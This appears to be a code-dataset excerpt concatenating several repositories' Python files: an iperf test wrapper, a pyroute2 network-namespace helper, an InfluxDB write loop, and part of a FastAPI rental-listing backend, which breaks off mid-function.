description=None,
url=None,
match_method="exact",
):
"""
NOT IMPLEMENTED
Method to take node attributes and return list of matched node IDs
"""
pass
def _find_link(
self,
edge_id=None,
label=None,
src_label=None,
trgt_label=None,
source=None,
target=None,
description=None,
match_method="exact",
):
"""
NOT IMPLEMENTED
Method to take node attributes and return list of matched node IDs
"""
pass
``` |
{
"source": "jinjamator/pyperf2",
"score": 2
} |
#### File: pyperf2/pyperf2/__init__.py
```python
import queue
import subprocess
import threading
import signal
import time
import json
import re
import os
import pyjq
import copy
from decimal import Decimal
from pprint import pprint, pformat
import logging
import datetime
def output_reader(proc, outq, parent):
for line in iter(proc.stdout.readline, b""):
outq.put(line.decode("utf-8"))
# print("{0} {1}".format(parent.name,line.decode('utf-8')))
parent.line_ready_callback()
class IPerfInstance(object):
def __init__(self):
self.type = None
self.report_interval = "1"
self.protocol = "tcp"
self.iperf_binary_path = "/usr/bin/iperf"
self._outq = queue.Queue()
self._proc = None
self.server_ip = None
self.bind_ip = None
self.name = None
self._running = False
self.realtime = True
self.bandwidth = "1000pps"
self.port = "5001"
self.status = "configured"
self._result_regex = None
self._info_regex = None
self._results = {}
self.test_duration = "86400"
self.client_source_port = None
self.use_linux_namespace = None
self._on_data_callbacks = []
self._on_packetloss_callbacks = []
self.currently_has_loss = {}
self._output_reader_thread = None
self._cleanup_timer_thread = None
self._raw_log_filepath = None
self._raw_log_filehandler = None
self._creation_time = datetime.datetime.now().replace(microsecond=0).isoformat()
if "pps" in self.bandwidth:
self.expected_interval_packets = int(
Decimal(self.report_interval) * Decimal(self.bandwidth[:-3])
)
else:
self.expected_interval_packets = None
self._log = logging.getLogger("")
self._current_event_number = 0
def __del__(self):
try:
self._raw_log_filehandler.close()
except:
pass
def set_raw_log_path(self, path):
self._raw_log_filepath = "{0}{1}{3}_{2}_instance_raw.log".format(
path, os.path.sep, self.name, self._creation_time
)
self._raw_log_filehandler = open(self._raw_log_filepath, "w")
def line_ready_callback(self):
info_data = None
report_data = None
line = self._outq.get(block=True)
stream_id = None
interval_begin = None
interval_end = None
last_interval_begin = None
is_receiver = False
is_sender = False
packets_lost = None
packets_received = None
packet_loss_event_message = False
report_message = False
timestamp = datetime.datetime.now().isoformat()
if self._raw_log_filehandler:
self._raw_log_filehandler.write(line)
self._raw_log_filehandler.flush()
result = self._info_regex.match(line) # check if it's an info header
if result:
info_data = result.groupdict()
stream_id = info_data["stream_id"]
if (
stream_id not in self._results
): # new stream id detected -> create new result structure
self._results[stream_id] = {
"summary": {},
"detail": [],
"info": result.groupdict(),
"events": [],
"timestamp": timestamp,
}
self.currently_has_loss[stream_id] = False
result = self._result_regex.match(line) # check if it's a report line
if result:
report_data = result.groupdict()
stream_id = report_data["stream_id"]
interval_begin = Decimal(report_data["interval_begin"])
interval_end = Decimal(report_data["interval_end"])
if "packets_lost" in report_data:
is_receiver = True
packets_lost = int(report_data["packets_lost"])
packets_received = int(report_data["packets_received"])
else:
is_sender = True
try: # check if we have a predecessor result
last_interval_begin = Decimal(
self._results[stream_id]["detail"][-1]["interval_begin"]
)
except IndexError:
last_interval_begin = -1
if (
last_interval_begin > interval_begin
): # if it's a summary store it and return
self._results[stream_id]["summary"] = result.groupdict()
self._log.debug("got summary result")
return True # suppress any message for summary
if is_receiver:
report_message = copy.copy(report_data)
report_message["stream_name"] = self.name
if packets_received < self.expected_interval_packets:
probably_packets_lost = (
self.expected_interval_packets - packets_received
)
# print('probably lost {0}'.format(probably_packets_lost))
if (
probably_packets_lost > 4
): # ignore minimal loss because it could also be a timing issue
report_message["packets_lost"] = probably_packets_lost
report_message[
"packets_received"
] = self.expected_interval_packets
packets_lost = probably_packets_lost
packets_received = self.expected_interval_packets
# print('{0} {1}'.format(packets_lost, packets_received))
if (
packets_lost > self.expected_interval_packets + 4
): # handle summary packet loss message
# pprint( self._results[stream_id]['events'])
try:
packets_lost = (
packets_lost
- self._results[stream_id]["events"][-1][
"total_packets_lost_since_event_start"
]
)
packets_received = self.expected_interval_packets - packets_lost
report_message["packets_lost"] = packets_lost
report_message["packets_received"] = packets_received
# print('{0} {1}'.format(packets_lost,packets_received))
except IndexError: # loss without event registred, can only be at interval_begin 0.0 -> ignore
# print('----------------------index error------------------------')
if interval_begin == 0:
report_message["packets_lost"] = 0
report_message[
"packets_received"
] = self.expected_interval_packets
else:
self._log.debug(pformat(self._results))
self._log.debug(pformat(report_message))
self._log.debug(line)
raise Exception("Something went wrong")
packet_loss_event_message = {
"event_number": self._current_event_number,
"stream_id": str(stream_id),
"stream_name": self.name,
"status": "",
"total_packets_lost_since_event_start": 0,
"packets_lost": packets_lost,
"packets_received": packets_received,
"event_begin": interval_begin,
"event_end": None,
"timestamp_start": timestamp,
"timestamp_current": timestamp,
"timestamp_end": None,
}
if packets_received == 0: # handle 100% packet loss situation
report_message["packets_lost"] = self.expected_interval_packets
packets_lost = self.expected_interval_packets
if self.currently_has_loss[stream_id]:
self._log.debug(
"losing all packets, receiving nothing, should receive {} (cont.)".format(
self.bandwidth
)
)
self._results[stream_id]["events"][-1][
"total_packets_lost_since_event_start"
] += packets_lost
self._results[stream_id]["events"][-1][
"timestamp_current"
] = timestamp
self._results[stream_id]["events"][-1][
"packets_lost"
] = packets_lost
self._results[stream_id]["events"][-1][
"status"
] = "losing all packets (cont.)"
self._results[stream_id]["events"][-1][
"packets_received"
] = packets_received
packet_loss_event_message = copy.copy(
self._results[stream_id]["events"][-1]
)
else:
self._log.debug(
"losing all packets, receiving nothing, should receive {}".format(
self.bandwidth
)
)
self._current_event_number += 1
packet_loss_event_message[
"event_number"
] = self._current_event_number
packet_loss_event_message[
"packets_lost"
] = (
self.expected_interval_packets
) # set lost packets to pps because iperf reports 0 lost which breaks graph
packet_loss_event_message[
"total_packets_lost_since_event_start"
] = packets_lost
packet_loss_event_message["status"] = "losing all packets"
packet_loss_event_message["packets_received"] = packets_received
self._results[stream_id]["events"].append(
packet_loss_event_message
)
self.currently_has_loss[stream_id] = True
elif packets_lost > 0: # handle packet loss situation
if self.currently_has_loss[
stream_id
]: # handle ongoing packet loss situation
self._log.debug("ongoing packet loss detected")
self._results[stream_id]["events"][-1][
"total_packets_lost_since_event_start"
] += packets_lost
self._results[stream_id]["events"][-1][
"timestamp_current"
] = timestamp
self._results[stream_id]["events"][-1][
"status"
] = "losing packets (cont.)"
self._results[stream_id]["events"][-1][
"packets_lost"
] = packets_lost
self._results[stream_id]["events"][-1][
"packets_received"
] = packets_received
packet_loss_event_message = copy.copy(
self._results[stream_id]["events"][-1]
)
else: # handle new packet loss situation
self._log.debug("begin of packet loss detected")
self.currently_has_loss[stream_id] = True
self._current_event_number += 1
packet_loss_event_message[
"event_number"
] = self._current_event_number
packet_loss_event_message["status"] = "losing packets"
packet_loss_event_message[
"total_packets_lost_since_event_start"
] = packets_lost
self._results[stream_id]["events"].append(
packet_loss_event_message
)
elif self.currently_has_loss[stream_id]: # handle end of loss situation
self._log.debug("end of packet loss detected")
self.currently_has_loss[stream_id] = False
self._results[stream_id]["events"][-1][
"timestamp_current"
] = timestamp
self._results[stream_id]["events"][-1]["timestamp_end"] = timestamp
self._results[stream_id]["events"][-1][
"interval_end"
] = interval_end
self._results[stream_id]["events"][-1]["status"] = "stable"
self._results[stream_id]["events"][-1][
"packets_lost"
] = packets_lost
self._results[stream_id]["events"][-1][
"packets_received"
] = packets_received
packet_loss_event_message = copy.copy(
self._results[stream_id]["events"][-1]
)
else: # do not send loss event in case of no loss
packet_loss_event_message = False
else:
self._log.debug("cannot parse report line: {0}".format(line))
if packet_loss_event_message:
# print(packet_loss_event_message)
# self._results[stream_id]['events'].append(packet_loss_event_message)
for callback, args in self._on_packetloss_callbacks:
callback(packet_loss_event_message, **args)
if report_message:
self._results[stream_id]["detail"].append(report_message)
for callback, args in self._on_data_callbacks:
callback(report_message, **args)
def get_result_events(self):
results_with_packet_loss = pyjq.all('.[] | select(.packets_lost!="0")', data)
events = []
event_data = []
event_begin = None
event_loss = 0
for idx, result in enumerate(results_with_packet_loss):
event_data.append(result)
event_loss += int(result["packets_lost"])
if not event_begin:
event_begin = Decimal(result["interval_begin"])
try:
if (
result["interval_end"]
!= results_with_packet_loss[idx + 1]["interval_begin"]
):
events.append(
{
"detail": event_data,
"summary": {
"total_loss": event_loss,
"begin": str(event_begin),
"end": str(Decimal(result["interval_end"])),
"duration": str(
Decimal(result["interval_end"]) - event_begin
),
"packet_rate": "{0[packet_rate]} {0[packet_rate_unit]}".format(
result
),
},
}
)
event_data = []
event_loss = 0
event_begin = None
except IndexError:
events.append(
{
"detail": event_data,
"summary": {
"total_loss": event_loss,
"begin": str(event_begin),
"end": str(Decimal(result["interval_end"])),
"duration": str(
Decimal(result["interval_end"]) - event_begin
),
"packet_rate": "{0[packet_rate]} {0[packet_rate_unit]}".format(
result
),
},
}
)
return events
def register_on_data_callback(self, cb, **kwargs):
self._on_data_callbacks.append((cb, kwargs))
def register_on_packtetloss_callback(self, cb, **kwargs):
self._on_packetloss_callbacks.append((cb, kwargs))
@property
def get_name(self):
if not self.name:
raise ValueError("iperf instance needs a name")
return self.name
def output_reader(self):
for line in iter(self._proc.stdout.readline, b""):
self._outq.put(line.decode("utf-8"))
def set_options(self, **kwargs):
for option_name, option_value in kwargs.items():
self.__setattr__(option_name, str(option_value))
if "pps" in self.bandwidth:
self.expected_interval_packets = int(
Decimal(self.report_interval) * Decimal(self.bandwidth[:-3])
)
else:
self.expected_interval_packets = None
def get_options(self):
retval = {}
for k, v in self.__dict__.items():
if not k.startswith("_"):
retval[k] = v
return retval
def generate_cli_from_options(self):
_cli = []
if self.use_linux_namespace:
_cli.extend("ip netns exec {0}".format(self.use_linux_namespace).split(" "))
_cli.append(self.iperf_binary_path)
_cli.append("-e")
_cli.append("-t")
_cli.append(self.test_duration)
if self.type == "server":
_cli.append("-s")
if self.bind_ip:
_cli.append("-B")
_cli.append(self.bind_ip)
if self.protocol == "udp":
# multicast server result
# [ 4] 2.6000-2.7000 sec 0.00 Bytes 0.00 bits/sec 0.000 ms 0/ 0 (0%) -/-/-/- ms 0 pps
# [ 3] 8.7000-8.8000 sec 144 KBytes 11.8 Mbits/sec 0.002 ms 0/ 100 (0%) 0.015/ 0.008/ 0.037/ 0.006 ms 1000 pps 100753.94
self._result_regex = re.compile(
r"^\[\s*(?P<stream_id>\d+)\]\s+(?P<interval_begin>\d+\.\d+)-(?P<interval_end>\d+\.\d+)\s+(?P<interval_unit>\S+)\s+(?P<received>\S+)\s+(?P<received_unit>\S+)\s+(?P<bandwidth>\S+)\s+(?P<bandwidth_unit>\S+)\s+(?P<jitter>\S+)\s+(?P<jitter_unit>\S+)\s+(?P<packets_lost>\S+)/\s*(?P<packets_received>\S+)\s+\(.*\)\s+(?P<latency_avg>\S+)\s*/\s*(?P<latency_min>\S+)\s*/\s*(?P<latency_max>\S+)\s*/\s*(?P<latency_stdev>\S+)\s+(?P<latency_unit>\S+)\s+(?P<packet_rate>\d+)\s+(?P<packet_rate_unit>\S+)\s*(?P<net_pwr>\S+)?"
)
elif self.type == "client":
_cli.append("-c")
if not self.server_ip:
raise ValueError("Client needs server_ip to be set")
_cli.append(self.server_ip)
if self.bind_ip and self.client_source_port:
_cli.append("-B")
_cli.append("{0}:{1}".format(self.bind_ip, self.client_source_port))
if self.protocol == "udp":
# [ 3] local 192.168.51.154 port 54877 connected with 172.16.58.3 port 5001
self._result_regex = re.compile(
r"^\[\s*(?P<stream_id>\d+)\]\s+(?P<interval_begin>\d+\.\d+)-(?P<interval_end>\d+\.\d+)\s+(?P<interval_unit>\S+)\s+(?P<transferred>\S+)\s+(?P<transferred_unit>\S+)\s+(?P<bandwidth>\S+)\s+(?P<bandwidth_unit>\S+)\s+(?P<packets_written>\S+)/(?P<packets_error>\S+)\s+(?P<packet_rate>\d+)\s+(?P<packet_rate_unit>\S+)"
)
else:
raise ValueError("type must be set to either server or client")
if self.protocol == "udp":
_cli.append("-u")
self._info_regex = re.compile(
r"^\[\s*(?P<stream_id>\d+)\]\s+local\s+(?P<local_ip>\S+)\s+port\s+(?P<local_port>\S+)\s+connected\s+with\s+(?P<remote_ip>\S+)\s+port\s+(?P<remote_port>\S+)"
)
#
if self.realtime:
_cli.append("-z")
_cli.append("-i")
_cli.append(self.report_interval)
_cli.append("-b")
_cli.append(self.bandwidth)
_cli.append("-p")
_cli.append(self.port)
return _cli
def start(self, create_thread_function=threading.Thread):
self._results = {}
if self._cleanup_timer_thread:
self._cleanup_timer_thread.join()
del self._cleanup_timer_thread
self._cleanup_timer_thread = None
# print(' '.join(self.generate_cli_from_options()))
self._proc = subprocess.Popen(
self.generate_cli_from_options(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
if not self._output_reader_thread:
self._output_reader_thread = create_thread_function(
target=output_reader, args=(self._proc, self._outq, self)
)
self._output_reader_thread.start()
self._running = True
self.status = "running"
time.sleep(0.2)
self._cleanup_timer_thread = threading.Timer(
int(self.test_duration) + 10, self.stop
)
self._cleanup_timer_thread.start()
if self._proc.poll() is not None:
self.stop()
return False
return True
def stop(self):
if self._running:
self._proc.terminate()
self._proc.wait()
del self._proc
self._proc = None
self._output_reader_thread.join()
del self._output_reader_thread
self._output_reader_thread = None
self._running = False
self.status = "stopped"
if self._raw_log_filehandler:
self._raw_log_filehandler.close()
return True
def get_results(self):
return self._results
class Server(IPerfInstance):
def __init__(self):
super(Server, self).__init__()
self.type = "server"
class Client(IPerfInstance):
def __init__(self, server_ip=None):
super(Client, self).__init__()
self.type = "client"
``` |
{
"source": "jinjamator/simplenetlink",
"score": 3
} |
#### File: simplenetlink/simplenetlink/__init__.py
```python
from pyroute2 import IPRoute, netns, NetNS, netlink
import socket
import logging
import time
class SimpleNetlink(object):
def __init__(self, namespace=None):
self.ipr = IPRoute()
self._log = logging.getLogger("SimpleNetlink")
self._current_namespace = namespace
self._previous_namespace_instance = None
self._previous_namespace = None
# self._log.level = logging.DEBUG
self._supported_virtual_interface_types = ["ipvlan", "tagged"]
def get_interface_index(self, ifname):
res = self.ipr.link_lookup(ifname=ifname)
if len(res) == 1:
return res[0]
else:
if len(res) == 0:
raise ValueError(
f"no result found for {ifname} in namespace {self.get_current_namespace_name()}"
)
else:
self._log.error(
f"multiple results found for {ifname}: {res} -> returning first"
)
return res[0]
def create_namespace(self, namespace):
ns = netns.create(namespace)
self.set_current_namespace(namespace)
idx = self.get_interface_index("lo")
self.ipr.link("set", index=idx, state="up")
self.restore_previous_namespace()
def set_current_namespace(self, namespace):
if not namespace:
if self._current_namespace:
self._log.info(f"close {self._current_namespace}")
self.ipr.close()
self._previous_namespace = self._current_namespace
self.ipr = IPRoute()
self._current_namespace = namespace
elif namespace not in self.get_namespaces():
self._log.debug(
f"{namespace} does not exist, implicitly creating namespace {namespace}"
)
self.create_namespace(namespace)
if namespace:
self._previous_namespace = self._current_namespace
if self.ipr:
self.ipr.close()
self.ipr = NetNS(namespace)
self._current_namespace = namespace
self._log.debug(
f"switched namespace from {self._previous_namespace} to {self._current_namespace}"
)
return True
def restore_previous_namespace(self):
tmp_i = self.ipr
tmp = self._current_namespace
self.ipr = self._previous_namespace_instance
self._current_namespace = self._previous_namespace
self._previous_namespace_instance = tmp_i
self._previous_namespace = tmp
self._log.debug(f"restored previous namespace {self._current_namespace}")
return True
def delete_namespace(self, namespace):
if namespace in self.get_namespaces():
ns = NetNS(namespace)
ns.close()
ns.remove()
self._log.debug(f"removed namespace {namespace}")
if namespace == self._current_namespace:
self.set_current_namespace(None)
time.sleep(
0.1
) # give kernel some time, this workarounds various 'already existing' problams
else:
self._log.debug(
f"cannot remove non existing namespace {namespace} -> ignoring request"
)
def get_current_namespace_name(self):
return self._current_namespace
def get_namespaces(self):
return list(netns.listnetns())
def find_interface_in_all_namespaces(self, interface_name):
idx = None
namespace = self.get_current_namespace_name()
try:
self.set_current_namespace(None)
idx = self.get_interface_index(interface_name)
namespace = self.get_current_namespace_name()
self.restore_previous_namespace()
except ValueError:
for namespace in self.get_namespaces():
self._log.debug(f"switching namespace to {namespace}")
self.set_current_namespace(namespace)
try:
idx = self.get_interface_index(interface_name)
break
except:
pass
self.restore_previous_namespace()
if idx:
self._log.debug(
f"found interface {interface_name} in namespace {namespace} with index {idx}"
)
else:
self._log.debug(f"cannot find interface {interface_name} in any namespace")
return (namespace, idx)
def __create_tagged(self, interface_name, **kwargs):
if kwargs.get("parent_interface"):
(base_namespace, base_idx) = self.find_interface_in_all_namespaces(
kwargs.get("parent_interface")
)
self._log.debug(
f"found parent_interface {kwargs.get('parent_interface')} in namespace {base_namespace}"
)
if not kwargs.get("vlan_id"):
raise ValueError(
"vlan_id not specified -> cannot create tagged vlan interface without"
)
else:
self._log.debug(
f"creating tagged interface {interface_name} with tag on base_interface"
)
self.set_current_namespace(base_namespace)
self.ipr.link(
"add",
ifname=interface_name,
kind="vlan",
link=base_idx,
vlan_id=int(kwargs.get("vlan_id")),
)
idx = self.get_interface_index(interface_name)
namespace = kwargs.get("namespace")
if namespace:
if kwargs.get("namespace") not in self.get_namespaces():
self.create_namespace(namespace)
self.ipr.link("set", index=idx, net_ns_fd=namespace)
self.set_current_namespace(namespace)
idx = self.get_interface_index(interface_name)
else:
self.ipr.link("set", index=idx, net_ns_pid=1)
return (namespace, idx)
else:
raise ValueError(
f"parent_interface not specified for vlan interface {interface_name}"
)
def __create_ipvlan(self, interface_name, **kwargs):
ipvlan_modes = {
"l2": 0,
"l3": 1,
"l3s": 2,
}
if kwargs.get("parent_interface"):
(base_namespace, base_idx) = self.find_interface_in_all_namespaces(
kwargs.get("parent_interface")
)
self._log.debug(f"found parent_interface in namespace {base_namespace}")
self.set_current_namespace(base_namespace)
self.ipr.link(
"add",
ifname=interface_name,
kind="ipvlan",
link=base_idx,
ipvlan_mode=ipvlan_modes[
"l2"
], # l2 mode so arp can be handled from namespace
)
idx = self.get_interface_index(interface_name)
namespace = kwargs.get("namespace")
if namespace:
self.set_current_namespace(namespace)
self.set_current_namespace(base_namespace)
self.ipr.link("set", index=idx, net_ns_fd=kwargs.get("namespace"))
self.set_current_namespace(namespace)
else:
self.ipr.link("set", index=idx, net_ns_pid=1)
self.set_current_namespace(None)
idx = self.get_interface_index(interface_name)
return (namespace, idx)
else:
raise ValueError(
f"parent_interface not specified for ipvlan interface {interface_name}"
)
def create_interface(self, interface_name, **kwargs):
f = getattr(self, f"_SimpleNetlink__create_{kwargs.get('type')}")
if f:
(namespace, idx) = f(interface_name, **kwargs)
if kwargs.get("link_state", "").lower() == "down":
self.ipr.link("set", index=idx, state="down")
else:
self._log.debug(
f"enabling interface {interface_name} in namespace {namespace}"
)
self.ipr.link("set", index=idx, state="up")
return (namespace, idx)
else:
raise ValueError(f"type {kwargs.get('type')} not implemented")
def ensure_interface_exists(self, interface, **kwargs):
namespace, idx = self.find_interface_in_all_namespaces(interface)
if idx:
if kwargs.get("namespace") != namespace:
self._log.debug(
f'interface is in namespace {namespace} -> moving to {kwargs.get("namespace")}'
)
if kwargs.get("namespace"):
self.set_current_namespace(kwargs.get("namespace"))
self.set_current_namespace(namespace)
self.ipr.link("set", index=idx, net_ns_fd=kwargs.get("namespace"))
self.set_current_namespace(kwargs.get("namespace"))
self.interface_up(interface)
else:
self.set_current_namespace(namespace)
self.ipr.link("set", index=idx, net_ns_pid=1)
self.set_current_namespace(None)
self.interface_up(interface)
else:
if kwargs.get("type") in self._supported_virtual_interface_types:
self._log.debug(
f'interface type of {interface} is virtual interface of type {kwargs.get("type")} which does not exist -> creating'
)
namespace, idx = self.create_interface(interface, **kwargs)
else:
raise ValueError(
f"either physical interface just doesn't exist (typo?) or virtual type {kwargs.get('type')} is not supported"
)
for ipv4_config_item in kwargs.get("ipv4", []):
self.interface_add_ipv4(interface, ipv4_config_item)
return (namespace, idx)
def interface_add_ipv4(self, interface_name, prefix):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
address, prefix_len = prefix.strip().split("/")
prefix_len = int(prefix_len)
try:
self.ipr.addr("add", index=idx, address=address, prefixlen=prefix_len)
except netlink.exceptions.NetlinkError as e:
if e.code == 98 or e.code == 17:
self._log.debug(
f"prefix {prefix} already in use in namespace {self._current_namespace} -> ignoring request"
)
self._log.debug(e)
return True
else:
raise (e)
self._log.debug(
f"setting ipv4_address {prefix} on {interface_name} in namespace {self._current_namespace}"
)
return True
def interface_delete_ipv4(self, interface_name, prefix):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
address, prefix_len = prefix.strip().split("/")
prefix_len = int(prefix_len)
try:
self.ipr.addr("del", index=idx, address=address, prefixlen=prefix_len)
except netlink.exceptions.NetlinkError as e:
if e.code == 98 or e.code == 17:
self._log.debug(
f"prefix {prefix} already in use in namespace {self._current_namespace} -> ignoring request"
)
self._log.debug(e)
return True
else:
raise (e)
self._log.debug(
f"setting ipv4_address {prefix} on {interface_name} in namespace {self._current_namespace}"
)
return True
def interface_up(interface_name):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
self.ipr.link("set", index=idx, state="up")
def interface_down(interface_name):
idx = self.get_interface_index(interface_name)
if not idx:
raise ValueError(
f"interface {interface_name} not found in namespace {self._current_namespace}"
)
self.ipr.link("set", index=idx, state="down")
def get_routes(self):
retval = {
'static':{},
'dynamic':{},
'local':{}
}
for route in self.ipr.route("show", type=1):
if route.get_attr('RTA_GATEWAY'):
dest = route.get_attr('RTA_DST')
if dest:
dest=f"{dest}/{route.get('dst_len')}"
else:
dest='default'
if dest not in retval['static']:
retval['static'][dest]=[]
retval['static'][dest].append(route.get_attr('RTA_GATEWAY'))
elif route.get_attr('RTA_PREFSRC'):
dest = f"{route.get_attr('RTA_DST')}/{route.get('dst_len')}"
if dest not in retval['local']:
retval['local'][dest]=[]
retval['local'][dest].append(f"{route.get_attr('RTA_PREFSRC')}")
else:
raise ValueError(f'Never come here, if so something is really wrong. {route}')
return retval
def add_route(self, prefix, nexthop):
try:
self.ipr.route("add", gateway=nexthop, dst=prefix)
self._log.debug(
f"added route {prefix} via {nexthop} in namespace {self._current_namespace}"
)
except netlink.exceptions.NetlinkError as e:
if e.code == 17:
self._log.debug(
f"route {prefix} via {nexthop} in namespace {self._current_namespace} exists -> ignoring"
)
pass
else:
raise (e)
def delete_route(self, prefix, nexthop):
try:
self.ipr.route("del", gateway=nexthop, dst=prefix)
except netlink.exceptions.NetlinkError as e:
if e.code == 3:
self._log.debug(
f"route {prefix} via {nexthop} in namespace {self._current_namespace} does not exist -> ignoring request to delete"
)
else:
raise (e)
def get_network_interfaces_info(self):
results = {}
for link in self.ipr.get_links():
ipv4 = []
ipv6 = []
for addr in self.ipr.get_addr(
family=socket.AF_INET, label=link.get_attr("IFLA_IFNAME")
):
ipv4.append(
{
"prefix_length": addr["prefixlen"],
"address": addr.get_attr("IFA_ADDRESS"),
}
)
for addr in self.ipr.get_addr(
family=socket.AF_INET6, label=link.get_attr("IFLA_IFNAME")
):
ipv6.append(
{
"prefix_length": addr["prefixlen"],
"address": addr.get_attr("IFA_ADDRESS"),
}
)
results[link.get_attr("IFLA_IFNAME")] = {
"link_state": link["state"].lower(),
"oper_state": link.get_attr("IFLA_OPERSTATE").lower(),
"mac_address": link.get_attr("IFLA_ADDRESS", "None").lower(),
"mtu": link.get_attr("IFLA_MTU"),
"ipv4": ipv4,
"ipv6": ipv6,
}
return results
``` |
{
"source": "jinjd/k8sdemo-master",
"score": 3
} |
#### File: single-mid/influxdb/influxdb_test.py
```python
from influxdb import InfluxDBClient
from datetime import datetime
import time
client = InfluxDBClient(host='influxdb.default', port=8086, database='pods')
def write_to_influx(data):
now = datetime.utcnow().isoformat() + 'Z'
json_body = [
{
"measurement": "pod_shutdown_data",
"tags": {
},
"time": str(now),
"fields": data
}
]
try:
client.create_database('pods')
client.write_points(json_body)
#sanitycheck
result = client.query('select * from pod_shutdown_data;')
print('result',str(result))
except Exception as e:
print('error',str(e))
i = 1
while True:
i += 1
data = {
'somekey':i
}
write_to_influx(data)
time.sleep(5)
``` |
{
"source": "jinjf553/hook_up_rent",
"score": 2
} |
#### File: hook_up_rent/backend/main.py
```python
import time
from datetime import timedelta
from random import choice
from typing import List, Optional
from fastapi import Depends, FastAPI, File, UploadFile
from fastapi.staticfiles import StaticFiles
from passlib.context import CryptContext
from pydantic import BaseModel
from sqlalchemy.orm import Session
from config import ACCESS_TOKEN_EXPIRE_MINUTES, HEADERS, STATIC_DIR
from orm import DBSession, DBUser
from utils import create_access_token, get_current_user
app = FastAPI()
''' 运行命令: uvicorn main:app --reload --host 0.0.0.0 --port 8000'''
app.mount("/static", StaticFiles(directory=STATIC_DIR), name="static")
class User(BaseModel):
# id: int
username: str
password: <PASSWORD>
status: Optional[int] = 0
description: Optional[str] = ''
body: Optional[dict] = {'token': ''}
class Config:
orm_mode = True
class Houses(BaseModel):
title: str
description: str
price: str
size: str
oriented: str
roomType: str
floor: str
community: str
houseImg: str
supporting: str
class Config:
orm_mode = True
@app.get("/")
def read_root():
return {"Hello": "World"}
@app.post("/user/registered", response_model=User)
async def user_register(user: User, db: Session = Depends(DBSession)):
# 密码加密
password = CryptContext(schemes=["bcrypt"],
deprecated="auto").hash(user.password)
db_user = DBUser(username=user.username, password=password)
DBUser.add(db, db_user)
db_user.status, db_user.description = 200, '注册陈功!'
return db_user
@app.post("/user/login", response_model=User)
async def register(user: User, db: Session = Depends(DBSession)):
db_user = DBUser.get_by_username(db, user.username)
# 密码加密
verify = CryptContext(schemes=["bcrypt"], deprecated="auto")
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(
data={"sub": user.username}, expires_delta=access_token_expires
)
if not db_user:
db_user = User(username='', password='')
db_user.status = 300
db_user.description = '用户不存在!'
return db_user
elif not verify.verify(user.password, db_user.password):
db_user.status = 300
db_user.description = '你的账号或密码错误!'
return db_user
else:
db_user.status, db_user.description = 200, '账号登录成功!'
db_user.body['token'] = access_token
print(db_user.status)
return db_user
@app.get("/user", response_model=User)
async def read_users_me(username: User = Depends(get_current_user), db: Session = Depends(DBSession)):
print('login_username: ', username, time.strftime('%M%S'))
db_user: User = DBUser.get_by_username(db, username)
if not db_user or not username:
db_user = User(username='', password='', status=400, description='登录信息失效,请重新登录!')
return db_user
db_user.description, db_user.status = '成功', 200
if 'token' in db_user.body:
db_user.body.pop('token')
db_user.body.update({'avatar': choice(HEADERS),
'nickname': f'好客_{str(db_user.id).rjust(6, "0")}',
'gender': choice(['男', '女']),
'phone': '小米', 'id': db_user.id})
return db_user
@app.get("/houses/condition")
async def get_houses_condition(id: str, db: Session = Depends(DBSession)):
response_json = {'status': 200, 'description': '请求成功', 'body': {
'area': {'label': '区域', 'value': 'area', 'children': [{'label': '不限', 'value': 'null'}, {'label': '朝阳', 'value': 'AREA|zhaoyang'}]},
'characteristic': [{'label': '集中供暖', 'value': 'CHAR|jizhonggongnuan'}],
'floor': [{'label': '高楼层', 'value': 'FLOOR|1'}],
'rentType': [{'label': '不限', 'value': 'null'}],
'oriented': [{'label': '东', 'value': 'ORIEN|1'}],
'price': [{'label': '不限', 'value': 'null'}],
'roomType': [{'label': '一室', 'value': 'ROOM|1'}],
'subway': {'label': '地铁', 'value': 'subway', 'children': [{'label': '不限', 'value': 'null'}]}
}}
if id == 'AREA|1111':
return response_json
else:
response_json['body']['area']['children'] = [{'label': '不限', 'value': 'null'}, {'label': '宝山', 'value': 'AREA|baoshan'}]
return response_json
@app.get("/houses")
async def get_houses(cityId, area, mode, price, more, start, end, db: Session = Depends(DBSession)):
response_json = {'status': 200, 'description': '请求成功', 'body': {
'list': [{'houseCode': '11', 'title': '线上', 'desc': 'subtitle', 'houseImg': 'static/images/轮播1.jpg', 'tags': ['近地铁'], 'price': 2000}]
}}
if area == 'AREA|zhaoyang':
return response_json
else:
response_json['body']['list'][0]['title'] = '线下'
return response_json
@app.get("/houses/params")
async def get_houses_params():
response_json = {'status': 200, 'description': '请求成功', 'body': {
'floor': [{'value': '1', 'label': '高楼层'}, {'value': '2', 'label': '中楼层'}, {'value': '3', 'label': '低楼层'}],
'roomType': [{'value': '1', 'label': '一室'}, {'value': '2', 'label': '二室'}, {'value': '3', 'label': '三室'}, {'value': '4', 'label': '四室'}],
'oriented': [{'value': '1', 'label': '东'}, {'value': '2', 'label': '南'}, {'value': '3', 'label': '西'}, {'value': '4', 'label': '北'}]}}
return response_json
@app.post("/house/image")
async def post_houses_image(file: List[UploadFile] = File(...), username: User = Depends(get_current_user)):
response_json = {'status': 200, 'description': '请求成功', 'body': []}
for x in file:
with open(f'{STATIC_DIR}/{x.filename}', 'wb') as f:
f.write(await x.read())
response_json['body'].append(x.filename)
return response_json
@app.get("/houses/{roomId}")
async def get_houses_room(roomId: int, db: Session = Depends(DBSession)):
response_json = {'status': 200,
'description': '请求成功',
'body': {'houseCode': '1111',
'title': '整租 中山路 历史最低点',
'community': '中山花园',
'description':
